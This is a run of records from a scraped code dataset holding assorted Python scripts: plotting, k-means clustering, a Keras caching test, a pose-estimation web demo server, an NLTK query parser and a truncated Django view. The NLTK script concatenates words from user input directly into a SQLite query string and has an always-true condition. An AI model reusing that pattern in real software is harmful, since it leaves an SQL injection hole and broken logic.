\nax.get_yaxis().set_visible(False)\n\nplt.show()\n","sub_path":"molecular_motion.py","file_name":"molecular_motion.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"374100066","text":"#a;lsk;lkajd make the imports\n#Hello world\n###test\n#Hello\n#Hello world\n#lkj;lkj\n#test1\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import io, signal # we will also import the signal module, from s\ndef plot_spectrogram(spg, t, f, freq_lims=[0,100], plot_db=False):\n plt.figure(figsize=(15,4))\n if plot_db:\n plt.imshow(10*np.log10(spg), aspect='auto', extent=[t[0], t[-1], f[-1], f[0]])\n else:\n plt.imshow(spg, aspect='auto', extent=[t[0], t[-1], f[-1], f[0]])\n plt.xlabel('Time'); plt.ylabel('Frequency(Hz)');\n plt.ylim(freq_lims)\n plt.colorbar()\n plt.tight_layout()\n\nT, fs = 20, 1000\nt = np.arange(0,T,1/float(fs))\n# simulate a signal\n# refer to the function documentation for f0, t1, f1\nsig = signal.chirp(t, f0=10, t1=20,f1=30)\n\n# plot it\nplt.figure(figsize=(15,3))\nplt.plot(t,sig)\nplt.xlim([0,5])\nplt.xlabel('Time (s)'); plt.ylabel('Voltage (V)');\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"341447412","text":"import matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MaxNLocator\nimport numpy as np\nimport pandas as pd\nimport random\nfrom copy import deepcopy\nfrom sklearn.preprocessing import MinMaxScaler\nimport Functions as fun\n\nK_NUMBER = 5\nMAX_NUMBER_OF_EPOCHS = 15\ncolors = ['r', 'g', 'b', 'y', 'c', 'm', 'purple', 'orange', 'navy', 'turquoise', 'aquamarine', 'gray', 'darkgreen']\nchosen_marker = 'x'\nscale = 150\n\nplt.figure(figsize=(10, 6))\n\ndef plot(filename, all_data, clusters, cent_plot, epochs):\n if filename == 'iris.data':\n plot_irises(filename, all_data, clusters, cent_plot, epochs)\n elif filename == 'wine.data':\n plot_wines(filename, all_data, clusters, cent_plot, epochs)\n elif filename == 'forestfires.csv':\n plot_forestfires(filename, all_data, clusters, cent_plot, epochs) \n\ndef plot_irises(filename, all_data, clusters, cent_plot, epochs):\n \"\"\"Make a plot for iris.data\"\"\"\n plt.subplot(2,2,1)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 0], points[:, 1], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 0], cent_plot[:, 1], marker=chosen_marker, s=scale, c='black', label = 'centroids')\n plt.xlabel('sepal length')\n plt.ylabel('sepal width')\n plt.legend()\n\n plt.subplot(2,2,2)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 2], points[:, 3], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 2], cent_plot[:, 3], marker=chosen_marker, s=scale, c='black', label = 'centroids')\n plt.xlabel('petal length')\n plt.ylabel('petal width')\n plt.legend()\n \n plt.suptitle('K-means, epochs: ' + str(epochs) + '\\n' + filename) \n\ndef plot_wines(filename, all_data, clusters, cent_plot, epochs):\n \"\"\"Make a plot for wine.data\"\"\"\n plt.subplot(3, 3, 1)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(\n len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 0], points[:, 12], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 0], cent_plot[:, 12],\n marker=chosen_marker, s=scale, c='black', label = 'centroids')\n plt.xlabel('alcohol')\n plt.ylabel('proline')\n plt.legend()\n\n plt.subplot(3, 3, 2)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(\n len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 1], points[:, 4], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 1], cent_plot[:, 4],\n marker=chosen_marker, s=scale, c='black', label = 'centroids')\n plt.xlabel('malic acid')\n plt.ylabel('magnesium')\n plt.legend()\n\n plt.subplot(3, 3, 3)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(\n len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 2], points[:, 3], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 2], cent_plot[:, 3],\n marker=chosen_marker, s=scale, c='black', label = 'centroids')\n plt.xlabel('ash')\n plt.ylabel('alcality of ash')\n plt.legend() \n\n plt.subplot(3, 3, 4)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(\n len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 6], points[:, 5], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 6], cent_plot[:, 5],\n marker=chosen_marker, s=scale, c='black', label = 'centroids')\n plt.xlabel('flavanoids')\n plt.ylabel('total phenols')\n plt.legend() \n\n plt.subplot(3, 3, 5)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(\n len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 6], points[:, 8], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 6], cent_plot[:, 8],\n marker=chosen_marker, s=scale, c='black', label = 'centroids')\n plt.xlabel('flavanoids')\n plt.ylabel('proanthocyanins')\n plt.legend() \n\n plt.subplot(3, 3, 6)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(\n len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 9], points[:, 10], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 9], cent_plot[:, 10],\n marker=chosen_marker, s=scale, c='black', label = 'centroids')\n plt.xlabel('color intensity')\n plt.ylabel('hue')\n plt.legend() \n\n plt.subplot(3, 3, 7)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(\n len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 11], points[:, 12], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 11], cent_plot[:, 12],\n marker=chosen_marker, s=scale, c='black', label = 'centroids')\n plt.xlabel('OD280/OD315 of diluted wines')\n plt.ylabel('proline')\n plt.legend() \n\n plt.suptitle('K-means, epochs: ' + str(epochs) + '\\n' + filename) \n\ndef plot_forestfires(filename, all_data, clusters, cent_plot, epochs):\n \"\"\"Make a plot for forestfires.csv\"\"\"\n plt.subplot(3,3,1)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 2], points[:, 3], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 2], cent_plot[:, 3], marker=chosen_marker, s=scale, c='black', label='centroids')\n plt.xlabel('FFMC')\n plt.ylabel('DMC')\n plt.legend()\n \n plt.subplot(3,3,2)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 3], points[:, 4], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 3], cent_plot[:, 4], marker=chosen_marker, s=scale, c='black', label='centroids')\n plt.xlabel('DMC')\n plt.ylabel('DC')\n plt.legend()\n \n plt.subplot(3,3,3)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 3], points[:, 10], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 3], cent_plot[:, 10], marker=chosen_marker, s=scale, c='black', label='centroids')\n plt.xlabel('DMC')\n plt.ylabel('burned area')\n plt.legend()\n \n plt.subplot(3,3,7)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 4], points[:, 5], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 4], cent_plot[:, 5], marker=chosen_marker, s=scale, c='black', label='centroids')\n plt.xlabel('DC')\n plt.ylabel('ISI')\n plt.legend()\n \n plt.subplot(3,3,8)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 6], points[:, 7], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 6], cent_plot[:, 7], marker=chosen_marker, s=scale, c='black', label='centroids')\n plt.xlabel('temperature')\n plt.ylabel('humidity')\n plt.legend()\n \n plt.subplot(3,3,9)\n for i in range(K_NUMBER):\n points = np.array([all_data[j] for j in range(len(all_data)) if clusters[j] == i])\n plt.scatter(points[:, 8], points[:, 9], s=7, c=colors[i])\n plt.scatter(cent_plot[:, 8], cent_plot[:, 9], marker=chosen_marker, s=scale, c='black', label='centroids')\n plt.xlabel('wind')\n plt.ylabel('rain')\n plt.legend()\n\n plt.suptitle('K-means, epochs: ' + str(epochs) + '\\n' + filename) \n \ndef plot_error(errors):\n plt.clf()\n plt.plot(list(range(1, len(errors) + 1)), errors)\n plt.xlabel('Epoch')\n plt.ylabel('Quantization error')\n plt.title('Error')\n plt.xticks(range(1, len(errors) + 1))\n\ndef Kmeans(filename):\n \"\"\"Implementation of k-means algorithm\"\"\"\n all_data = fun.data_alloc(filename)\n scaler = MinMaxScaler(feature_range = (0, 1))\n all_data = scaler.fit_transform(all_data)\n\n centroids = fun.pick_random_elements(all_data.tolist(), K_NUMBER)\n\n all_data_array = np.asarray(all_data)\n all_data = scaler.inverse_transform(all_data)\n cent_old = []\n clusters = np.zeros(len(all_data_array))\n pom = 0\n epochs = 0\n centroid_centerOfMass_distance = fun.dist(centroids, 0, None)\n wynik = []\n errors = []\n while centroid_centerOfMass_distance != 0 and epochs != MAX_NUMBER_OF_EPOCHS:\n epochs += 1\n for i in range(len(all_data_array)):\n distances = fun.dist(all_data_array[i], centroids)\n clusters[i] = np.argmin(distances) \n cent_old = deepcopy(centroids)\n \n for i in range(K_NUMBER):\n points = [all_data_array[j] for j in range(len(all_data_array)) if clusters[j] == i]\n centroids[i] = np.mean(points, axis=0)\n pom = 0\n for x in range(len(points)):\n pom += fun.dist(points[x],centroids[i],None) \n wynik.append(pom) \n \n centroid_centerOfMass_distance = fun.dist(centroids, cent_old, None)\n errors.append(centroid_centerOfMass_distance)\n cent_plot = scaler.inverse_transform(centroids)\n \n plt.clf()\n # plot(filename, all_data, clusters, cent_plot, epochs)\n # plt.savefig('plots\\\\kmeans_' + filename.split('.')[0] + str(epochs) + '.png', dpi=100)\n # plt.pause(0.03) \n print(\"Number of epochs: \" + str(epochs))\n print(\" \")\n print(\"_____________________\")\n print(\"Epoch: 0\")\n print(\"---------------------\")\n for i in range(len(wynik)):\n if(i%K_NUMBER==0 and i!=0):\n print(\"_____________________\")\n print(\"Epoch: \"+ str(i/K_NUMBER))\n print(\"---------------------\")\n print(wynik[i])\n else:\n print(wynik[i])\n # input(\"Press Enter to continue...\")\n plot_error(errors)\n # plt.savefig('plots\\\\kmeans_errors.png', dpi=100)\n # plt.pause(0.03)\n # input(\"Press Enter to continue...\")","sub_path":"Zad1/Kmeans.py","file_name":"Kmeans.py","file_ext":"py","file_size_in_byte":9957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"39905960","text":"from holdouts_generator import cached_holdouts_generator, skip, store_keras_result, load_result, add_work_in_progress\nfrom typing import Tuple, Dict\nfrom sklearn.datasets import load_iris\nfrom .utils import example_random_holdouts, clear_all_cache\nfrom tensorflow.keras import Sequential\nfrom tensorflow.keras.layers import Dense\nimport time\nimport pytest\n\ndef mlp()->Sequential:\n model = Sequential([\n *[Dense(units=10) for kwargs in range(3)],\n Dense(1, activation=\"sigmoid\"),\n ])\n model.compile(\n optimizer=\"nadam\",\n loss=\"mse\"\n )\n return model\n\n\ndef train(training: Tuple, testing: Tuple, hyper_parameters: Dict):\n start = time.time()\n model = mlp()\n parameters = {\n \"shuffle\": True\n }\n history = model.fit(\n *training,\n **hyper_parameters,\n **parameters,\n validation_data=testing,\n verbose=0\n ).history\n return {\n \"history\": history,\n \"x_train\": training[0],\n \"y_train_true\": training[1],\n \"x_test\": testing[0],\n \"y_test_true\": testing[1],\n \"model\": model,\n \"time\": time.time() - start,\n \"cache_dir\":\"holdouts\",\n \"results_directory\":\"results\",\n \"hyper_parameters\": hyper_parameters,\n \"parameters\": parameters\n }\n\n\ndef test_keras_cache():\n clear_all_cache(results_directory=\"results\", cache_dir=\"holdouts\")\n\n X, y = load_iris(return_X_y=True)\n X = X[y!=2]\n y = y[y!=2]\n generator = cached_holdouts_generator(\n X, y, holdouts=example_random_holdouts, cache_dir=\"holdouts\", skip=skip)\n hyper_parameters = {\n \"epochs\": 10\n }\n\n for _, _, inner in generator(results_directory=\"results\", hyper_parameters=hyper_parameters):\n for _ in inner(results_directory=\"results\", hyper_parameters=hyper_parameters):\n pass\n\n for (training, testing), outer_key, inner in generator(results_directory=\"results\", hyper_parameters=hyper_parameters):\n with pytest.raises(ValueError):\n load_result(\"results\", outer_key, hyper_parameters)\n add_work_in_progress(\"results\", outer_key, hyper_parameters)\n for (inner_training, inner_testing), inner_key, _ in inner(results_directory=\"results\", hyper_parameters=hyper_parameters):\n store_keras_result(inner_key, **train(inner_training, inner_testing, hyper_parameters))\n with pytest.raises(ValueError):\n store_keras_result(inner_key, **train(inner_training, inner_testing, hyper_parameters))\n store_keras_result(outer_key, **train(training, testing, hyper_parameters))\n\n for (training, testing), outer_key, inner in generator(results_directory=\"results\", hyper_parameters=hyper_parameters):\n assert training is None\n assert testing is None\n assert not inner()\n load_result(\"results\", outer_key, hyper_parameters)\n\n clear_all_cache(results_directory=\"results\", cache_dir=\"holdouts\")\n","sub_path":"tests/test_keras_cache.py","file_name":"test_keras_cache.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"602066665","text":"from __future__ import division\n\nimport argparse\nimport base64\nimport io\nimport json\nimport re\nimport time\n\nimport PIL\nimport torch\nimport tornado\nfrom tornado.web import RequestHandler\n\nimport databench\nimport openpifpaf\nimport openpifpaf.network.nets\nimport openpifpaf.transforms\n\nfrom . import __version__ as VERSION\n\n\nclass Processor(object):\n def __init__(self, args):\n # load model\n self.model, _ = openpifpaf.network.nets.factory_from_args(args)\n self.model = self.model.to(args.device)\n self.processor = openpifpaf.decoder.factory_from_args(args, self.model)\n self.device = args.device\n self.resolution = args.resolution\n\n def single_image(self, b64image):\n imgstr = re.search(r'base64,(.*)', b64image).group(1)\n image_bytes = io.BytesIO(base64.b64decode(imgstr))\n im = PIL.Image.open(image_bytes).convert('RGB')\n print('input image', im.size, self.resolution)\n\n landscape = im.size[0] > im.size[1]\n target_wh = (int(640 * self.resolution), int(480 * self.resolution))\n if not landscape:\n target_wh = (int(480 * self.resolution), int(640 * self.resolution))\n if im.size[0] != target_wh[0] or im.size[1] != target_wh[1]:\n print('!!! have to resize image to', target_wh, ' from ', im.size)\n im = im.resize(target_wh, PIL.Image.BICUBIC)\n width_height = im.size\n\n start = time.time()\n preprocess = openpifpaf.transforms.image_transform\n processed_image_cpu = preprocess(im)\n processed_image = processed_image_cpu.contiguous().to(self.device, non_blocking=True)\n print('preprocessing time', time.time() - start)\n\n all_fields = self.processor.fields(torch.unsqueeze(processed_image.float(), 0))[0]\n keypoint_sets, scores = self.processor.keypoint_sets(all_fields)\n\n # normalize scale\n keypoint_sets[:, :, 0] /= processed_image_cpu.shape[2]\n keypoint_sets[:, :, 1] /= processed_image_cpu.shape[1]\n\n return keypoint_sets, scores, width_height\n\n\nPROCESSOR_SINGLETON = None\n\n\nclass Demo(databench.Analysis):\n pass\n\n\n# pylint: disable=abstract-method\nclass PostHandler(RequestHandler):\n def set_default_headers(self):\n self.set_header('Access-Control-Allow-Origin', '*')\n self.set_header('Access-Control-Allow-Headers',\n 'Content-Type, Access-Control-Allow-Headers')\n\n def post(self): # pylint: disable=arguments-differ\n self.set_default_headers()\n\n image = self.get_argument('image', None)\n if image is None:\n image = json.loads(self.request.body).get('image', None)\n if image is None:\n self.write('no image provided')\n return\n\n keypoint_sets, scores, width_height = PROCESSOR_SINGLETON.single_image(image)\n keypoint_sets = [{\n 'coordinates': keypoints.tolist(),\n 'detection_id': i,\n 'score': score,\n 'width_height': width_height,\n } for i, (keypoints, score) in enumerate(zip(keypoint_sets, scores))]\n self.write(json.dumps(keypoint_sets))\n\n def options(self):\n self.set_default_headers()\n self.set_status(204)\n self.finish()\n\n\nasync def grep_static(url='http://127.0.0.1:5000', dest='openpifpafwebdemo/static/index.html'):\n http_client = tornado.httpclient.AsyncHTTPClient()\n response = await http_client.fetch(url)\n out = response.body.decode()\n out = out.replace('=\"/_static', '=\"_static')\n out = out.replace('href=\"/\"', 'href=\"/openpifpafwebdemo\"')\n with open(dest, 'w') as f:\n f.write(out)\n http_client.close()\n\n\ndef main():\n global PROCESSOR_SINGLETON # pylint: disable=global-statement\n\n parser = argparse.ArgumentParser()\n openpifpaf.decoder.cli(parser, force_complete_pose=False, instance_threshold=0.05)\n openpifpaf.network.nets.cli(parser)\n parser.add_argument('--disable-cuda', action='store_true',\n help='disable CUDA')\n parser.add_argument('--resolution', default=0.4, type=float)\n parser.add_argument('--grep-static', default=False, action='store_true')\n parser.add_argument('--google-analytics')\n args = parser.parse_args()\n\n # add args.device\n args.device = torch.device('cpu')\n if not args.disable_cuda and torch.cuda.is_available():\n args.device = torch.device('cuda')\n\n PROCESSOR_SINGLETON = Processor(args)\n\n if args.grep_static:\n tornado.ioloop.IOLoop.current().call_later(1.0, grep_static)\n\n tornado.autoreload.watch('openpifpafwebdemo/index.html')\n tornado.autoreload.watch('openpifpafwebdemo/analysis.js')\n\n databench.run(Demo, __file__,\n info={'title': 'OpenPifPafWebDemo',\n 'google_analytics': args.google_analytics,\n 'version': VERSION,\n 'resolution': args.resolution},\n static={r'(analysis\\.js.*)': '.', r'static/(.*)': 'openpifpafwebdemo/static'},\n extra_routes=[('process', PostHandler, None)])\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"openpifpafwebdemo/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"403912575","text":"from sim_dat2 import *\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nimport matplotlib.pyplot as plt\n\n\nX_set = x1\nX_set = X_set.astype('float32')\nX_set = X_set[:, np.newaxis]\nY = Y.astype('float32')\nX_train, X_test, Y_train, Y_test = train_test_split(X_set, Y, test_size = 0.1, random_state = 256)\n\n\n\n# Fits a linear regression type model\n# will use to compare to Neural Network\nregr = LinearRegression()\nregr.fit(X_train, Y_train)\ntrain_pred = regr.predict(X_train)\ntest_pred = regr.predict(X_test)\n\n\nprint('Coefficients: ', regr.intercept_ ,regr.coef_)\nprint('Train Error: ', mean_squared_error(Y_train, train_pred))\nprint('Test Error: ', mean_squared_error(Y_test, test_pred))\n\nplt.scatter(X_test, Y_test, color='r', s=10)\nplt.plot(X_test, test_pred, 'b', linewidth=3)\nplt.show()","sub_path":"NNvLR/1_lr_var.py","file_name":"1_lr_var.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"137974540","text":"n=int(input('Enter any Positive integer'))\r\n\r\n\r\np=n-2\r\nl=1\r\nfor i in range(n):\r\n if(i==0):\r\n print(' '*p,'*')\r\n p-=1\r\n elif(i==1):\r\n print(' '*p,'* *')\r\n elif(i==n-1):\r\n print('* '*n,end='')\r\n else:\r\n p=p-1 \r\n print(' '*p,'*',' '*l,'*')\r\n l=l+2\r\n \r\n\r\n\r\n","sub_path":"python assignmentFinal/Module3/hollow_triangle.py","file_name":"hollow_triangle.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"306562526","text":"import nltk\nfrom nltk.tokenize import word_tokenize\nfrom nltk.tag import pos_tag\nfrom nltk.corpus import stopwords\nimport sqlite3\nimport datetime\n\nlist_verb, list_noun, list_coordinating_conjunction, list_cardinal_digit = [], [], [], []\nlist_determiner, list_existential, list_foreign_word, list_preposition = [], [], [], []\nlist_adjective, list_adjective_comparative, list_adjective_superlative, list_marker = [], [], [], []\nlist_modal, list_noun_plural, list_proper_noun_singular, list_proper_noun_plural = [], [], [], []\nlist_predeterminer, list_possessive_ending, list_personal_pronoun, list_possessive_pronoun = [], [], [], []\nlist_adverb, list_adverb_comparative, list_adverb_superlative, list_particle = [], [], [], []\nlist_to, list_interjection, list_verb_past, list_verb_gerund_present_participle = [], [], [], []\nlist_verb_past_participle, list_verb_singular_present, list_verb_3rd_person_singular_present, list_wh_determiner = [], [], [], []\nlist_wh_pronoun, list_possessive_wh_pronoun, list_wh_adverb = [], [], []\n\ncount = 0\n\nprint(\"Jarvis at your service sir!\")\nquery = input(\"How may I help you?\\n\")\nstopwords = set(stopwords.words(\"english\"))\n#query = query.lower()\nwords = word_tokenize(query)\n# print(words)\ntagged_query = pos_tag(words)\n# print(tagged_query)\nfor i, j in tagged_query:\n # print(i, j)\n if j == \"VB\":\n list_verb.append(i)\n print(list_verb)\n elif j == \"NN\":\n list_noun.append(i)\n elif j == \"CC\":\n list_coordinating_conjunction.append(i)\n elif j == \"CD\":\n list_cardinal_digit.append(i)\n elif j == \"DT\":\n list_determiner.append(i)\n elif j == \"EX\":\n list_existential.append(i)\n elif j == \"FW\":\n list_foreign_word.append(i)\n elif j == \"IN\":\n list_preposition.append(i)\n elif j == \"JJ\":\n list_adjective.append(i)\n elif j == \"JJR\":\n list_adjective_comparative.append(i)\n elif j == \"JJS\":\n list_adjective_superlative.append(i)\n elif j == \"LS\":\n list_marker.append(i)\n elif j == \"MD\":\n list_modal.append(i)\n elif j == \"NNS\":\n list_noun_plural.append(i)\n elif j == \"NNP\":\n list_proper_noun_singular.append(i)\n elif j == \"NNPS\":\n list_proper_noun_plural.append(i)\n elif j == \"PDT\":\n list_predeterminer.append(i)\n elif j == \"POS\":\n list_possessive_ending.append(i)\n elif j == \"PRP\":\n list_personal_pronoun.append(i)\n elif j == \"PRP$\":\n list_possessive_pronoun.append(i)\n elif j == \"RB\":\n list_adverb.append(i)\n elif j == \"RBR\":\n list_adverb_comparative.append(i)\n elif j == \"RBS\":\n list_adverb_superlative.append(i)\n elif j == \"RP\":\n list_particle.append(i)\n elif j == \"TO\":\n list_to.append(i)\n elif j == \"UH\":\n list_interjection.append(i)\n elif j == \"VBD\":\n list_verb_past.append(i)\n elif j == \"VBG\":\n list_verb_gerund_present_participle.append(i)\n elif j == \"VBN\":\n list_verb_past_participle.append(i)\n elif j == \"VBP\":\n list_verb_singular_present.append(i)\n elif j == \"VBZ\":\n list_verb_3rd_person_singular_present.append(i)\n elif j == \"WDT\":\n list_wh_determiner.append(i)\n elif j == \"WP\":\n list_wh_pronoun.append(i)\n elif j == \"WP$\":\n list_possessive_wh_pronoun.append(i)\n elif j == \"WRB\":\n list_wh_adverb.append(i)\n else:\n print(\"Didn't understand the word '\" + i + \"' please train me! \")\n\nnow = datetime.datetime.now()\n\n\ndef create_file():\n with open(\"C:/Users/shubu/PycharmProjects/nltk_project/files/\" + now.strftime('%d-%b-%Y %H-%M %p') + \".txt\",\n \"w+\")as output_file:\n output_file.write(\"q) \" + query) # Write empty string\n\n\ncreate_file()\n\n# PRINTING PROCESS STARTS :\n\n# print(\"List of nouns:\")\n# print(list_noun)\n# print(\"List of Verbs:\")\n# print(list_verb)\n# print(\"Coordinating Conjunction:\")\n# print(list_coordinating_conjunction)\n# print(\"Cardinal digits:\")\n# print(list_cardinal_digit)\n# print(\"Determiner:\")\n# print(list_determiner)\n# print(\"Existential:\")\n# print(list_existential)\n# print(\"Foreign Word:\")\n# print(list_foreign_word)\n# print(\"Preposition:\")\n# print(list_preposition)\n# print(\"adjective:\")\n# print(list_adjective)\n# print(\"adjective comparative:\")\n# print(list_adverb_comparative)\n# print(\"adjective superlative:\")\n# print(list_adjective_superlative)\n# print(\"list marker:\")\n# print(list_marker)\n# print(\"Modal:\")\n# print(list_modal)\n# print(\"Plural noun:\")\n# print(list_noun_plural)\n# print(\"Singular Proper noun:\")\n# print(list_proper_noun_singular)\n# print(\"Plural Proper noun:\")\n# print(list_proper_noun_plural)\n# print(\"Predeterminer:\")\n# print(list_predeterminer)\n# print(\"Possessive Ending:\")\n# print(list_possessive_ending)\n# print(\"personal pronoun:\")\n# print(list_personal_pronoun)\n# print(\"possessive pronoun:\")\n# print(list_possessive_pronoun)\n# print(\"Adverb:\")\n# print(list_adverb)\n# print(\"adverb comparative:\")\n# print(list_adverb_comparative)\n# print(\"adverb superlative:\")\n# print(list_adverb_superlative)\n# print(\"particle:\")\n# print(list_particle)\n# print(\"To:\")\n# print(list_to)\n# print(\"Interjection:\")\n# print(list_interjection)\n# print(\"Past tense Verb:\")\n# print(list_verb_past)\n# print(\"Verb Gerund/Present Participle:\")\n# print(list_verb_gerund_present_participle)\n# print(\"Verb Past Participle:\")\n# print(list_verb_past_participle)\n# print(\"Singular Present Verb:\")\n# print(list_verb_singular_present)\n# print(\"3rd person singular present Verb:\")\n# print(list_verb_3rd_person_singular_present)\n# print(\"WH-Determiner:\")\n# print(list_wh_determiner)\n# print(\"WH-Pronoun:\")\n# print(list_wh_pronoun)\n# print(\"Possessive WH-Pronoun\")\n# print(list_possessive_wh_pronoun)\n# print(\"WH-Adverb\")\n# print(list_wh_adverb)\n\n# -----------------------------------------------------------------------------------------------------------------------------------\n\n# dict_verb, dict_noun, dict_coordinating_conjunction, dict_cardinal_digit = {}, {}, {}, {}\n# dict_determiner, dict_existential, dict_foreign_word, dict_preposition = {}, {}, {}, {}\n# dict_adjective, dict_adjective_comparative, dict_adjective_superlative, dict_marker = {}, {}, {}, {}\n# dict_modal, dict_noun_plural, dict_proper_noun_singular, dict_proper_noun_plural = {}, {}, {}, {}\n# dict_predeterminer, dict_possessive_ending, dict_personal_pronoun, dict_possessive_pronoun = {}, {}, {}, {}\n# dict_adverb, dict_adverb_comparative, dict_adverb_superlative, dict_particle = {}, {}, {}, {}\n# dict_to, dict_interjection, dict_verb_past, dict_verb_gerund_present_participle = {}, {}, {}, {}\n# dict_verb_past_participle, dict_verb_singular_present, dict_verb_3rd_person_singular_present, dict_wh_determiner = {}, {}, {}, {}\n# dict_wh_pronoun, dict_possessive_wh_pronoun, dict_wh_adverb = {}, {}, {}\n\n# ------------------------------------------------------------------------------------------------------------------------------------\n\ndict = {\"noun\": list_noun, \"verb\": list_verb, \"coordinating_conjunction\": list_coordinating_conjunction,\n \"cardinal_digit\": list_cardinal_digit, \"determiner\": list_determiner, \"existential\": list_existential,\n \"foreign_word\": list_foreign_word, \"preposition\": list_preposition, \"adjective\": list_adjective,\n \"adjective_comparative\": list_adjective_comparative, \"adjective_superlative\": list_adverb_superlative,\n \"marker\": list_marker, \"modal\": list_modal, \"noun_plural\": list_noun_plural,\n \"proper_noun_singular\": list_proper_noun_singular, \"proper_noun_plural\": list_proper_noun_plural,\n \"predeterminer\": list_predeterminer, \"possessive_ending\": list_possessive_ending,\n \"personal_pronoun\": list_personal_pronoun, \"possessive_pronoun\": list_possessive_pronoun, \"adverb\": list_adverb,\n \"adverb_comparative\": list_adverb_comparative, \"adverb_superlative\": list_adverb_superlative,\n \"particle\": list_particle, \"to\": list_to, \"interjection\": list_interjection, \"verb_past\": list_verb_past,\n \"verb_gerund_present_participle\": list_verb_gerund_present_participle,\n \"verb_past_participle\": list_verb_past_participle, \"verb_singular_present\": list_verb_singular_present,\n \"verb_3rd_person_singular_present\": list_verb_3rd_person_singular_present, \"wh_determiner\": list_wh_determiner,\n \"wh_pronoun\": list_wh_pronoun, \"possessive_wh_pronoun\": list_possessive_wh_pronoun, \"wh_adverb\": list_wh_adverb}\nprint(\"Dictionary of the parts of speech:\")\nprint(dict)\n\nconn = sqlite3.connect('test.db')\nprint(\"Opened database successfully\")\n\nstr1 = \"\"\nouput_file = open(\"C:/Users/shubu/PycharmProjects/nltk_project/files/\" + now.strftime('%d-%b-%Y %H-%M %p') + \".txt\",\n \"a+\")\n\nfor i in list_preposition:\n if dict['preposition'][count] == \"between\" or \"from\" or dict['noun'][count] == \"range\":\n cursor = conn.execute(\n \"SELECT * from COMPANY where \" + dict['noun'][count - 1] + \" > \" + dict['cardinal_digit'][0] + \" and \" +\n dict['noun'][count - 1] + \" < \" + dict['cardinal_digit'][1])\n for row in cursor:\n print(row)\n str1 = row\n ouput_file.write(\"\\n Solution: \" + str(str1))\n count = count + 1\n\n\nprint(\"Operation done successfully\");\nconn.close()\n","sub_path":"practice_nltk.py","file_name":"practice_nltk.py","file_ext":"py","file_size_in_byte":9265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"322200043","text":"from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom django.contrib import messages\t\nfrom django.urls import reverse_lazy\nfrom .models import Suspicious_report, Report_Information\nfrom .forms import UpdateReportInfoForm\nfrom django.shortcuts import get_object_or_404, redirect,render\nfrom django.db.models import Q\nfrom datetime import datetime, timedelta\nfrom django.contrib.auth.decorators import login_required\n#from suspicious_report.models import Suspicious_report\n\n@login_required(login_url=reverse_lazy(\"accounts:login\"))\ndef list_suspicious_reports(request, *args, **kwargs):\n\n\t#reports = Suspicious_report.objects.filter(date=datetime.now().date()).order_by(\"-time\",\"-date\")\n\treports = Suspicious_report.objects.all().order_by(\"-date\", \"-time\")\n\tquery \t\t\t= request.GET.get(\"q\")\t\n\tif query:\n\t\treports = 